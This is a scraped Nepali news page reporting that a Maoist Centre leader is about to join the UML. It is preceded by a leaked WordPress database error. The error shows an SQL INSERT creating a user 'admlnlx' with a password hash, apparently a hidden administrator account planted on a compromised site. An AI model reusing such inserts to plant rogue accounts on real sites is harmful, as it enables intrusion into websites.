WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bk2PIqFD4N8xazNJA9DQLm2WKN01ms1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:18:22', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ ९ –
नेकपा माओवादी केन्द्रका नेता राजकुमार कक्षपति एमालेमा प्रवेश गर्दैछन् । अहिले केहीबेरमा उनी एमालेमा प्रवेश गर्न लागेका हुन् । एमालेका अध्यक्ष केपी शर्मा ओलीको उपस्थितिमा हुने कार्यक्रममा एमालेमा प्रवेश गरेको घोषणा गर्न लागेको उनले जानकारी दिए ।
माओवादी पदलोलुप र आत्मकेन्द्रित भएको आरोप लगाउँदै उनले आफू एमालेमा प्रवेश गर्न लागेको बताए ।